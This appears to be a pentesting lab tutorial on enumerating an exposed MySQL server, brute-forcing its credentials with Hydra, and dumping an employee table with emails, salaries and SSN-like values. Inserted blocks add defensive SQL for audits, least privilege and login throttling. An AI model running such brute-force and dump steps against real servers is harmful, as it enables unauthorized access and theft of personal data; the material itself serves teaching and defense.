# MySQL

MySQL is one of the most popular open-source relational database management systems (RDBMS). It is used by websites, applications, and services to store and manage structured data such as user accounts, orders, logs, personal information, etc.

{% hint style="info" %}
MySQL is often paired with web servers (like Apache/Nginx) in a stack (e.g., LAMP, LEMP) and runs on port `3306` by default.
{% endhint %}

## Why Would a MySQL Server Be Accessible Over the Network?

Typically, **MySQL servers are meant to be accessed only locally** (from `localhost`) or from trusted IPs (like a backend webserver).

However, due to misconfigurations or neglect:

* It may be **exposed to the internet**.
* It may be **accessible from any IP (`0.0.0.0`)**.
* Weak **authentication policies** may be in place.
* And in many cases, **sensitive data is not encrypted** inside databases.

***

## Enumeration

Let’s say we found a host and want to see if MySQL is running. We use `nmap` to enumerate:

```bash
❯ nmap enumlikeapro.nca -T4 -sCV -p 3306
PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 8.0.42-0ubuntu0.22.04.1
| ssl-cert: Subject: commonName=MySQL_Server_8.0.42_Auto_Generated_Server_Certificate
| Not valid before: 2025-05-23T17:06:45
|_Not valid after:  2035-05-21T17:06:45
|_ssl-date: TLS randomness does not represent time
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.42-0ubuntu0.22.04.1
|   Thread ID: 14
|   Capabilities flags: 65535
|   Some Capabilities: Speaks41ProtocolNew, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, Speaks41ProtocolOld, FoundRows, InteractiveClient, LongPassword, SwitchToSSLAfterHandshake, SupportsLoadDataLocal, IgnoreSigpipes, SupportsTransactions, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, Support41Auth, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: \x0Fy\x08"PAjGZMv_R\x14%Ylj]+
|_  Auth Plugin Name: caching_sha2_password
```

{% hint style="info" %}
This shows MySQL is running on port `3306`, using `caching_sha2_password` for authentication — default in MySQL 8.0.
{% endhint %}

### Why Is This a Problem?

If a MySQL server is exposed and:

* Uses **weak credentials**
* Allows **remote login**
* Contains **PII (personally identifiable information)**, **user accounts**, **financial records**, or even **API keys**

Then an attacker can:

* Dump all data
* Exfiltrate internal secrets
* Potentially find credentials reused for other services like **SSH, web apps, or email**

This is a **massive breach risk**.

## Bruteforcing with Hydra

We can use Hydra to bruteforce MySQL credentials if we suspect usernames and weak passwords:

```bash
❯ hydra -l anil -P EnumLikeAPro/passwords.txt mysql://enumlikeapro.nca -t 32
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-23 23:13:01
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 52 login tries (l:1/p:52), ~13 tries per task
[DATA] attacking mysql://enumlikeapro.nca:3306/
[3306][mysql] host: enumlikeapro.nca   login: anil   password: REDACTED_PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-23 23:13:02
```

If credentials are guessed or found:

```bash
❯ mysql -h enumlikeapro.nca -u anil -p             
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 252
Server version: 8.0.42-0ubuntu0.22.04.1 (Ubuntu)

Copyright (c) 2000, 2025, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 
```

Once logged in, we can start enumerating the databases.

To list the databases in this MySQL instance, we can use the following command:

```bash
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| employee_data      |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.01 sec)
```

We can see three databases here. Of these, `information_schema` and `performance_schema` are default MySQL databases that store server metadata and performance statistics. `employee_data`, however, is non-standard, meaning someone must have created it.

We can choose `employee_data` database like so:

```bash
mysql> use employee_data;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
```

And we can now list tables in this database like so:

```bash
mysql> show tables;
+-------------------------+
| Tables_in_employee_data |
+-------------------------+
| archive_2020            |
| employees               |
+-------------------------+
2 rows in set (0.00 sec)
```

We can find two tables here. Let's write a SQL query to list all contents of the `employees` table:

```bash
mysql> select * from employees;
+-----+---------------------+-------------+-------------------------------------+------------+--------+-------------+
| id  | full_name           | department  | email                               | phone      | salary | ssn         |
+-----+---------------------+-------------+-------------------------------------+------------+--------+-------------+
|   1 | Steven Jones        | Sales       | whill@jones.com                     | 0962287394 |  74295 | 256-77-0221 |
|   2 | Michael Martin      | Engineering | lduncan@gmail.com                   | 6651673378 |  58878 | 609-57-3225 |
|   3 | Rebekah Williams    | Legal       | keithchurch@gmail.com               | 5410395848 |  77069 | 107-20-6423 |
|   4 | Craig Lewis         | Sales       | ehoover@yahoo.com                   | 7742157975 | 125740 | 745-52-0685 |
|   5 | Katie Watson        | Engineering | william06@simmons.com               | 8964647675 | 104014 | 093-05-2943 |
..SNIP..
```

We can also query only the columns of interest, like so:

```bash
mysql> select id,full_name from employees;
+-----+---------------------+
| id  | full_name           |
+-----+---------------------+
|   1 | Steven Jones        |
|   2 | Michael Martin      |
|   3 | Rebekah Williams    |
|   4 | Craig Lewis         |
|   5 | Katie Watson        |
|   6 | Aaron Blake         |
..SNIP..
```
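The enumeration above located PII (email, phone, salary, SSN) by hand. As an added example (not part of the original page), the following queries find such columns across every non-system schema via `INFORMATION_SCHEMA`, show what the account found by Hydra can reach, and then pin a reporting account down to the two columns the last query actually needed. The `%` host for `anil` and the `reporting`@`10.0.0.5` account are constructed assumptions.

```sql
-- Added example, not from the original page: discover PII-looking columns across all
-- non-system schemas, then apply least privilege with column-level grants.
-- Assumptions (constructed): anil's host is '%', backend/reporting host is 10.0.0.5.

-- 1. Where do sensitive-looking columns live? The lab's employees table matches on
--    email, phone, salary and ssn; system schemas are excluded from the sweep.
SELECT c.table_schema, c.table_name, c.column_name, c.column_type,
       t.table_rows                                  -- approximate for InnoDB
FROM information_schema.columns AS c
JOIN information_schema.tables  AS t
  ON t.table_schema = c.table_schema AND t.table_name = c.table_name
WHERE c.table_schema NOT IN ('mysql', 'information_schema', 'performance_schema', 'sys')
  AND c.column_name REGEXP '(^|_)(ssn|salary|phone|email|dob|pass(word)?|secret|token|api_?key|card)'
ORDER BY c.table_schema, c.table_name, c.ordinal_position;

-- 2. What can the brute-forced account actually read? (host '%' is an assumption)
SHOW GRANTS FOR 'anil'@'%';

-- 3. Least privilege: an account that only needs id/full_name/department should be
--    unable to run `select * from employees`. Column-level SELECT grants enforce that
--    at the server, and the host part limits where the account may connect from.
CREATE USER IF NOT EXISTS 'reporting'@'10.0.0.5' IDENTIFIED BY 'PLACEHOLDER-change-me';
GRANT SELECT (id, full_name, department) ON employee_data.employees TO 'reporting'@'10.0.0.5';

-- 4. Verify: only the three columns appear in the grant, and nothing on archive_2020.
SHOW GRANTS FOR 'reporting'@'10.0.0.5';
```

After step 3, `select * from employees` as `reporting` fails with a column-denied error, while `select id,full_name from employees` still works.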

## Realistic Credential Sources

In real-world scenarios, credentials may be:

* Found in **config files** on a compromised system
* Reused from **FTP, SSH, or web panel**
* Leaked in **backups**, **source code**, or **logs**

> In our lab, the same user (`anil`) had access to **MySQL**, demonstrating how **credential reuse increases risk**.
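The misconfigurations listed at the top of this page (listening on every interface, accounts allowed from any IP, weak passwords) and the brute-force run shown in the Hydra section can all be checked and closed from inside MySQL. The following is an added example and not code from the original page; it assumes MySQL 8.0, a DBA session, and a backend web server at the constructed address `10.0.0.5`.

```sql
-- Added hardening/audit example, not from the original page. MySQL 8.0 syntax.
-- Constructed assumptions: the only legitimate client is the backend at 10.0.0.5.

-- 1. Is the server listening on all interfaces ('*' or '0.0.0.0') and is TLS enforced?
SELECT @@bind_address AS bind_address, @@port AS port,
       @@require_secure_transport AS tls_only;

-- 2. Which accounts may log in from anywhere, with what plugin, and are any passwordless?
SELECT user, host, plugin, account_locked,
       (authentication_string = '') AS empty_password
FROM mysql.user
WHERE host IN ('%', '0.0.0.0') OR authentication_string = '';

-- 3. Pin the application account to the one host that needs it (host '%' assumed).
RENAME USER 'anil'@'%' TO 'anil'@'10.0.0.5';

-- 4. Throttle repeated failed logins. Hydra above made 52 attempts in about one second;
--    after the threshold, each further failure from that user/host is delayed.
INSTALL PLUGIN CONNECTION_CONTROL SONAME 'connection_control.so';
INSTALL PLUGIN CONNECTION_CONTROL_FAILED_LOGIN_ATTEMPTS SONAME 'connection_control.so';
SET PERSIST connection_control_failed_connections_threshold = 3;
SET PERSIST connection_control_min_connection_delay = 1000;    -- ms, grows per failure
SET PERSIST connection_control_max_connection_delay = 60000;

-- 5. Reject weak passwords going forward (existing hashes are not re-checked).
INSTALL COMPONENT 'file://component_validate_password';
SET PERSIST validate_password.policy = 'STRONG';
SET PERSIST validate_password.length = 14;

-- 6. Detection: which user@host pairs have been failing, and how often?
SELECT userhost, failed_attempts
FROM information_schema.CONNECTION_CONTROL_FAILED_LOGIN_ATTEMPTS
ORDER BY failed_attempts DESC;
```

The `bind_address` value itself is set in `my.cnf` (`bind-address`), so step 1 only reports it; steps 2 and 6 are safe to run repeatedly as an audit.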

## Want to Learn SQL?

Once you gain access to a MySQL database, knowing **how to use SQL** becomes very important. You’ll need to know how to:

* View databases and tables
* Extract information from columns
* Search for sensitive data
* Dump flags or credentials

If you're not already familiar with SQL queries, this is the perfect time to learn them.

You can learn more about SQL queries from here:

* <https://sqlzoo.net/>
* <https://www.w3schools.com/sql/>
* <https://www.hackerrank.com/domains/sql>

These sites will teach you:

* `SELECT`, `WHERE`, `LIKE`, `LIMIT`, `ORDER BY`
* `JOIN`s
* `INFORMATION_SCHEMA` usage
* and more advanced database techniques

{% hint style="info" %}
As a pentester or CTF player, being fluent in SQL is extremely valuable — both for exploitation and for understanding how systems store and manage data.
{% endhint %}
